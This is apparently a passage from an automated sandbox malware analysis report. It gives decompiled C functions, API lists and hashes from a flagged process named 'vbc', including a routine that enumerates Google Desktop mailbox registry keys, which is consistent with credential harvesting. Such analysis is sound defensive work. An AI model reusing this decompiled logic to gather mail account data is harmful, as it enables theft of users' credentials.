                                                              • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                              • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3202206310-1998499579
                                                              • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                              • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                              • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                              • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E00408572(void* __esi) {
                                                              				intOrPtr _t9;
                                                              				intOrPtr _t10;
                                                              				intOrPtr _t11;
                                                              				intOrPtr* _t18;
                                                              				void* _t19;
                                                              
                                                              				_t19 = __esi;
                                                              				_t9 =  *((intOrPtr*)(__esi + 0x24));
                                                              				if(_t9 != 0) {
                                                              					_push(_t9);
                                                              					L004115D6();
                                                              				}
                                                              				_t10 =  *((intOrPtr*)(_t19 + 0x34));
                                                              				if(_t10 != 0) {
                                                              					_push(_t10);
                                                              					L004115D6();
                                                              				}
                                                              				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
                                                              				if(_t11 != 0) {
                                                              					_push(_t11);
                                                              					L004115D6();
                                                              				}
                                                              				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
                                                              				if(_t18 != 0) {
                                                              					_t11 =  *_t18;
                                                              					if(_t11 != 0) {
                                                              						_push(_t11);
                                                              						L004115D6();
                                                              						 *_t18 = 0;
                                                              					}
                                                              					_push(_t18);
                                                              					L004115D6();
                                                              				}
                                                              				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
                                                              				 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                              				 *((intOrPtr*)(_t19 + 0x34)) = 0;
                                                              				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
                                                              				return _t11;
                                                              			}








                                                              0x00408572
                                                              0x00408572
                                                              0x0040857b
                                                              0x0040857d
                                                              0x0040857e
                                                              0x00408583
                                                              0x00408584
                                                              0x00408589
                                                              0x0040858b
                                                              0x0040858c
                                                              0x00408591
                                                              0x00408592
                                                              0x0040859a
                                                              0x0040859c
                                                              0x0040859d
                                                              0x004085a2
                                                              0x004085a3
                                                              0x004085ab
                                                              0x004085ad
                                                              0x004085b1
                                                              0x004085b3
                                                              0x004085b4
                                                              0x004085ba
                                                              0x004085ba
                                                              0x004085bc
                                                              0x004085bd
                                                              0x004085c2
                                                              0x004085c4
                                                              0x004085ca
                                                              0x004085cd
                                                              0x004085d0
                                                              0x004085d7

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                              • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                              • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                              • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 70%
                                                              			E004085D8(intOrPtr* __edi) {
                                                              				void* __esi;
                                                              				void** _t7;
                                                              				intOrPtr* _t12;
                                                              				intOrPtr* _t18;
                                                              				intOrPtr _t21;
                                                              				intOrPtr _t22;
                                                              				intOrPtr _t23;
                                                              				intOrPtr _t24;
                                                              
                                                              				_t18 = __edi;
                                                              				 *__edi = 0x413320;
                                                              				E00408572(__edi);
                                                              				_t21 =  *((intOrPtr*)(__edi + 0x10));
                                                              				if(_t21 != 0) {
                                                              					E00406B5B(_t21);
                                                              					_push(_t21);
                                                              					L004115D6();
                                                              				}
                                                              				_t22 =  *((intOrPtr*)(_t18 + 0xc));
                                                              				if(_t22 != 0) {
                                                              					E00406B5B(_t22);
                                                              					_push(_t22);
                                                              					L004115D6();
                                                              				}
                                                              				_t23 =  *((intOrPtr*)(_t18 + 8));
                                                              				if(_t23 != 0) {
                                                              					E00406B5B(_t23);
                                                              					_push(_t23);
                                                              					L004115D6();
                                                              				}
                                                              				_t24 =  *((intOrPtr*)(_t18 + 4));
                                                              				if(_t24 != 0) {
                                                              					E00406B5B(_t24);
                                                              					_push(_t24);
                                                              					L004115D6();
                                                              				}
                                                              				_t12 = _t18;
                                                              				_t7 =  *((intOrPtr*)( *_t12))();
                                                              				free( *_t7);
                                                              				return _t7;
                                                              			}











                                                              0x004085d8
                                                              0x004085db
                                                              0x004085e1
                                                              0x004085e6
                                                              0x004085eb
                                                              0x004085ed
                                                              0x004085f2
                                                              0x004085f3
                                                              0x004085f8
                                                              0x004085f9
                                                              0x004085fe
                                                              0x00408600
                                                              0x00408605
                                                              0x00408606
                                                              0x0040860b
                                                              0x0040860c
                                                              0x00408611
                                                              0x00408613
                                                              0x00408618
                                                              0x00408619
                                                              0x0040861e
                                                              0x0040861f
                                                              0x00408624
                                                              0x00408626
                                                              0x0040862b
                                                              0x0040862c
                                                              0x00408631
                                                              0x00408632
                                                              0x0040863c
                                                              0x00408640
                                                              0x00408646

                                                              APIs
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                              • free.MSVCRT(00000000), ref: 00408640
                                                                • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??3@$free
                                                              • String ID:
                                                              • API String ID: 2241099983-0
                                                              • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                              • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                              • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                              • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 19%
                                                              			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
                                                              				void* __esi;
                                                              				void* _t11;
                                                              				void* _t26;
                                                              				void* _t27;
                                                              
                                                              				_t26 = __edx;
                                                              				_t11 = _a4 - 0x110;
                                                              				_t27 = __ecx;
                                                              				if(_t11 == 0) {
                                                              					E0040E4A4(__ecx, __ecx, __eflags);
                                                              					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
                                                              					L5:
                                                              					return E004015AE(_t27, _a4, _a8, _a12);
                                                              				}
                                                              				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
                                                              					goto L5;
                                                              				} else {
                                                              					SetBkMode(_a8, 1);
                                                              					SetBkColor(_a8, GetSysColor(5));
                                                              					SetTextColor(_a8, 0xc00000);
                                                              					return GetSysColorBrush(5);
                                                              				}
                                                              			}







                                                              0x0040e81a
                                                              0x0040e820
                                                              0x0040e826
                                                              0x0040e828
                                                              0x0040e871
                                                              0x0040e879
                                                              0x0040e87f
                                                              0x00000000
                                                              0x0040e88a
                                                              0x0040e82d
                                                              0x00000000
                                                              0x0040e83c
                                                              0x0040e841
                                                              0x0040e853
                                                              0x0040e861
                                                              0x00000000
                                                              0x0040e869

                                                              APIs
                                                                • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                              • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                              • GetSysColor.USER32(00000005), ref: 0040E849
                                                              • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                              • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                              • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                              • String ID:
                                                              • API String ID: 1869857563-0
                                                              • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                              • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                              • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                              • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
                                                              				char _v265;
                                                              				char _v520;
                                                              				char _v532;
                                                              				RECT* _v540;
                                                              				char _v560;
                                                              				intOrPtr _v564;
                                                              				char _v568;
                                                              				intOrPtr _v572;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				int _t54;
                                                              				void* _t77;
                                                              				short _t85;
                                                              				short _t86;
                                                              				RECT* _t97;
                                                              				intOrPtr _t104;
                                                              
                                                              				_t93 = __ecx;
                                                              				_t97 = 0;
                                                              				_t104 = __ecx;
                                                              				_v564 = __ecx;
                                                              				if(_a4 == 0 || _a4 == 1) {
                                                              					_t85 = _a8;
                                                              					if(_t85 == 0x9c42) {
                                                              						_t54 = DestroyWindow( *(_t104 + 0x108));
                                                              					}
                                                              					_t114 = _t85 - 0x9c49;
                                                              					if(_t85 == 0x9c49) {
                                                              						_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
                                                              					}
                                                              					_t115 = _t85 - 0x9c59;
                                                              					if(_t85 == 0x9c59) {
                                                              						_t54 = E0040AE70(_t97, _t104, _t115);
                                                              					}
                                                              					_t116 = _t85 - 0x9c56;
                                                              					if(_t85 == 0x9c56) {
                                                              						_t54 = E0040ADB3(_t104, _t116);
                                                              					}
                                                              					if(_a8 == 0x9c58) {
                                                              						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
                                                              						_t54 = E0040A27F(0, _t93, _t104, 0);
                                                              					}
                                                              					if(_a8 == 0x9c44) {
                                                              						_t54 = E0040AD9D(_t104);
                                                              					}
                                                              					if(_a8 == 0x9c43) {
                                                              						_v532 = 0x413560;
                                                              						E00401000(_t93,  &_v520, 0x412404);
                                                              						E00401000(_t93,  &_v265, 0x412440);
                                                              						_t104 = _v564;
                                                              						_push( *(_t104 + 0x108));
                                                              						_push( &_v532);
                                                              						_t77 = 0x70;
                                                              						E00401540(_t77);
                                                              						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                              						_t20 =  &_v540; // 0x413560
                                                              						_t54 = E0040143D(_t20);
                                                              						_t97 = 0;
                                                              					}
                                                              					_t86 = _a8;
                                                              					_t122 = _t86 - 0x9c41;
                                                              					if(_t86 == 0x9c41) {
                                                              						_t54 = E0040AD38(_t104, _t93, _t122);
                                                              					}
                                                              					if(_t86 != 0x9c47) {
                                                              						L23:
                                                              						__eflags = _t86 - 0x9c4f;
                                                              						if(_t86 != 0x9c4f) {
                                                              							L27:
                                                              							__eflags = _t86 - 0x9c48;
                                                              							if(_t86 == 0x9c48) {
                                                              								_t54 = E0040AC8A(_t104, _t86);
                                                              							}
                                                              							__eflags = _t86 - 0x9c45;
                                                              							if(__eflags == 0) {
                                                              								_t100 = _t104 + 0x36c;
                                                              								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
                                                              								E0040A27F(0, _t93, _t104, __eflags);
                                                              								_t93 = 1;
                                                              								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
                                                              								_t97 = 0;
                                                              								__eflags = 0;
                                                              							}
                                                              							__eflags = _a8 - 0x9c46;
                                                              							if(__eflags == 0) {
                                                              								_t54 = E0040B095(_t104, __eflags, _t97);
                                                              							}
                                                              							__eflags = _a8 - 0x9c5c;
                                                              							if(_a8 == 0x9c5c) {
                                                              								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
                                                              								__eflags = 0;
                                                              								E0040A27F(0, _t93, _t104, 0);
                                                              								E0040A437(_t104);
                                                              								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
                                                              							}
                                                              							__eflags = _a8 - 0x9c4a;
                                                              							if(__eflags == 0) {
                                                              								_t54 = E0040B095(_t104, __eflags, 1);
                                                              							}
                                                              							__eflags = _a8 - 0x9c4b;
                                                              							if(_a8 == 0x9c4b) {
                                                              								_v540 = _t97;
                                                              								_v560 = 0x412ff4;
                                                              								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                              								_v568 = 0x412ff4;
                                                              								_t54 = E0040143D( &_v560);
                                                              								_t104 = _v572;
                                                              							}
                                                              							__eflags = _a8 - 0x9c4c;
                                                              							if(_a8 == 0x9c4c) {
                                                              								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
                                                              							}
                                                              							__eflags = _a8 - 0x9c4e;
                                                              							if(_a8 == 0x9c4e) {
                                                              								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
                                                              							}
                                                              							goto L43;
                                                              						}
                                                              						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                              						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
                                                              						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
                                                              							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
                                                              							goto L27;
                                                              						}
                                                              						_push(0xf000);
                                                              						_push(0x1000);
                                                              						goto L21;
                                                              					} else {
                                                              						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
                                                              							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
                                                              							goto L23;
                                                              						}
                                                              						_push(0xf000);
                                                              						_push(0x2000);
                                                              						L21:
                                                              						_push(0xffffffff);
                                                              						_t54 = E00408654(_t72);
                                                              						goto L43;
                                                              					}
                                                              				} else {
                                                              					L43:
                                                              					return _t54;
                                                              				}
                                                              			}




















                                                              0x0040b105
                                                              0x0040b114
                                                              0x0040b11a
                                                              0x0040b11c
                                                              0x0040b120
                                                              0x0040b12d
                                                              0x0040b136
                                                              0x0040b13e
                                                              0x0040b13e
                                                              0x0040b144
                                                              0x0040b149
                                                              0x0040b14b
                                                              0x0040b14b
                                                              0x0040b150
                                                              0x0040b155
                                                              0x0040b157
                                                              0x0040b157
                                                              0x0040b15c
                                                              0x0040b161
                                                              0x0040b165
                                                              0x0040b165
                                                              0x0040b170
                                                              0x0040b178
                                                              0x0040b17e
                                                              0x0040b17e
                                                              0x0040b189
                                                              0x0040b18d
                                                              0x0040b18d
                                                              0x0040b198
                                                              0x0040b1a3
                                                              0x0040b1ab
                                                              0x0040b1bc
                                                              0x0040b1c1
                                                              0x0040b1c5
                                                              0x0040b1cf
                                                              0x0040b1d2
                                                              0x0040b1d3
                                                              0x0040b1e4
                                                              0x0040b1ea
                                                              0x0040b1ee
                                                              0x0040b1f3
                                                              0x0040b1f3
                                                              0x0040b1f5
                                                              0x0040b1f9
                                                              0x0040b1fe
                                                              0x0040b202
                                                              0x0040b202
                                                              0x0040b20c
                                                              0x0040b23d
                                                              0x0040b23d
                                                              0x0040b242
                                                              0x0040b268
                                                              0x0040b268
                                                              0x0040b26d
                                                              0x0040b271
                                                              0x0040b271
                                                              0x0040b276
                                                              0x0040b27b
                                                              0x0040b27d
                                                              0x0040b285
                                                              0x0040b28b
                                                              0x0040b29d
                                                              0x0040b29e
                                                              0x0040b2a3
                                                              0x0040b2a3
                                                              0x0040b2a3
                                                              0x0040b2a5
                                                              0x0040b2ab
                                                              0x0040b2b0
                                                              0x0040b2b0
                                                              0x0040b2b5
                                                              0x0040b2bb
                                                              0x0040b2c3
                                                              0x0040b2c7
                                                              0x0040b2c9
                                                              0x0040b2ce
                                                              0x0040b2e1
                                                              0x0040b2e1
                                                              0x0040b2e7
                                                              0x0040b2ed
                                                              0x0040b2f3
                                                              0x0040b2f3
                                                              0x0040b2f8
                                                              0x0040b2fe
                                                              0x0040b306
                                                              0x0040b30f
                                                              0x0040b329
                                                              0x0040b330
                                                              0x0040b334
                                                              0x0040b339
                                                              0x0040b339
                                                              0x0040b33d
                                                              0x0040b343
                                                              0x0040b34b
                                                              0x0040b34b
                                                              0x0040b350
                                                              0x0040b356
                                                              0x0040b364
                                                              0x0040b364
                                                              0x00000000
                                                              0x0040b356
                                                              0x0040b244
                                                              0x0040b24a
                                                              0x0040b250
                                                              0x0040b263
                                                              0x00000000
                                                              0x0040b263
                                                              0x0040b252
                                                              0x0040b257
                                                              0x00000000
                                                              0x0040b20e
                                                              0x0040b20e
                                                              0x0040b21a
                                                              0x0040b238
                                                              0x00000000
                                                              0x0040b238
                                                              0x0040b21c
                                                              0x0040b221
                                                              0x0040b226
                                                              0x0040b226
                                                              0x0040b228
                                                              0x00000000
                                                              0x0040b228
                                                              0x0040b369
                                                              0x0040b369
                                                              0x0040b36f
                                                              0x0040b36f

                                                              APIs
                                                              • DestroyWindow.USER32(?), ref: 0040B13E
                                                              • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DestroyFocusInvalidateRectWindow
                                                              • String ID: `5A
                                                              • API String ID: 3502187192-343712130
                                                              • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                              • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                              • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                              • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				struct HDWP__* _v8;
                                                              				intOrPtr _v12;
                                                              				void* __ebx;
                                                              				intOrPtr _t29;
                                                              				struct HDWP__* _t30;
                                                              				RECT* _t58;
                                                              				intOrPtr _t66;
                                                              
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t66 = __ecx;
                                                              				_v12 = __ecx;
                                                              				if(_a4 != 5) {
                                                              					if(_a4 != 0x24) {
                                                              						if(_a4 == 0xf) {
                                                              							E0040173B(__ecx + 0xc);
                                                              						}
                                                              					} else {
                                                              						_t29 = _a12;
                                                              						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
                                                              						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
                                                              					}
                                                              				} else {
                                                              					_t30 = BeginDeferWindowPos(0xb);
                                                              					_t58 = _t66 + 0xc;
                                                              					_v8 = _t30;
                                                              					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
                                                              					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
                                                              					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
                                                              					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
                                                              					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
                                                              					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
                                                              					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
                                                              					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
                                                              					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
                                                              					E0040169B(_t58, _v8, 1, 1, 1, 0);
                                                              					E0040169B(_t58, _v8, 2, 1, 1, 0);
                                                              					EndDeferWindowPos(_v8);
                                                              					InvalidateRect( *(_t58 + 0x10), _t58, 1);
                                                              					_t66 = _v12;
                                                              				}
                                                              				return E004015AE(_t66, _a4, _a8, _a12);
                                                              			}










                                                              0x00405cf1
                                                              0x00405cf2
                                                              0x00405cf9
                                                              0x00405cfb
                                                              0x00405cfe
                                                              0x00405df3
                                                              0x00405e0c
                                                              0x00405e11
                                                              0x00405e11
                                                              0x00405df5
                                                              0x00405df5
                                                              0x00405df8
                                                              0x00405dff
                                                              0x00405dff
                                                              0x00405d04
                                                              0x00405d07
                                                              0x00405d0f
                                                              0x00405d1d
                                                              0x00405d23
                                                              0x00405d35
                                                              0x00405d47
                                                              0x00405d59
                                                              0x00405d6b
                                                              0x00405d7d
                                                              0x00405d8f
                                                              0x00405da1
                                                              0x00405db3
                                                              0x00405dc1
                                                              0x00405dd0
                                                              0x00405dd8
                                                              0x00405de3
                                                              0x00405de9
                                                              0x00405dec
                                                              0x00405e29

                                                              APIs
                                                              • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                              • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                              • String ID: $
                                                              • API String ID: 2498372239-3993045852
                                                              • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                              • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                              • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                              • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040719C(void* __ecx, intOrPtr _a4) {
                                                              				void _v259;
                                                              				char _v260;
                                                              				char _v264;
                                                              				void* _v268;
                                                              				void* _v276;
                                                              				long _t17;
                                                              				void* _t21;
                                                              				void* _t24;
                                                              				void* _t29;
                                                              				int _t32;
                                                              				signed int _t36;
                                                              				void* _t39;
                                                              				void* _t40;
                                                              				void* _t41;
                                                              
                                                              				_t29 = __ecx;
                                                              				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
                                                              				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
                                                              				if(_t17 == 0) {
                                                              					_t32 = 0;
                                                              					_v260 = 0;
                                                              					memset( &_v259, 0, 0xff);
                                                              					_t40 = _t39 + 0xc;
                                                              					_t21 = E0040EC05(_v268, 0,  &_v260);
                                                              					while(1) {
                                                              						_t41 = _t40 + 0xc;
                                                              						if(_t21 != 0) {
                                                              							break;
                                                              						}
                                                              						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
                                                              						_t40 = _t41 + 0xc;
                                                              						if(_t24 == 0) {
                                                              							E0040706C(_t29, _a4, _v264,  &_v260);
                                                              							RegCloseKey(_v276);
                                                              						}
                                                              						_t32 = _t32 + 1;
                                                              						_t21 = E0040EC05(_v268, _t32,  &_v260);
                                                              					}
                                                              					_t17 = RegCloseKey(_v268);
                                                              				}
                                                              				return _t17;
                                                              			}

















                                                              0x0040719c
                                                              0x004071b9
                                                              0x004071be
                                                              0x004071c3
                                                              0x004071ca
                                                              0x004071d2
                                                              0x004071d7
                                                              0x004071dc
                                                              0x004071e9
                                                              0x00407237
                                                              0x00407237
                                                              0x0040723c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407204
                                                              0x00407209
                                                              0x0040720e
                                                              0x0040721c
                                                              0x00407225
                                                              0x00407225
                                                              0x0040722c
                                                              0x00407232
                                                              0x00407232
                                                              0x00407242
                                                              0x00407242
                                                              0x00407249

                                                              APIs
                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                              • memset.MSVCRT ref: 004071D7
                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                              Strings
                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close$EnumOpenmemset
                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                              • API String ID: 2255314230-2212045309
                                                              • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                              • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                              • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                              • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040B70A(void* __esi) {
                                                              				struct _WNDCLASSA _v44;
                                                              				struct HINSTANCE__* _t15;
                                                              				struct HWND__* _t20;
                                                              
                                                              				_t15 =  *0x416b94; // 0x400000
                                                              				_v44.hInstance = _t15;
                                                              				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
                                                              				_v44.lpszClassName = __esi + 4;
                                                              				_v44.style = 0;
                                                              				_v44.lpfnWndProc = E004017C1;
                                                              				_v44.cbClsExtra = 0;
                                                              				_v44.cbWndExtra = 0;
                                                              				_v44.hCursor = 0;
                                                              				_v44.hbrBackground = 0x10;
                                                              				_v44.lpszMenuName = 0;
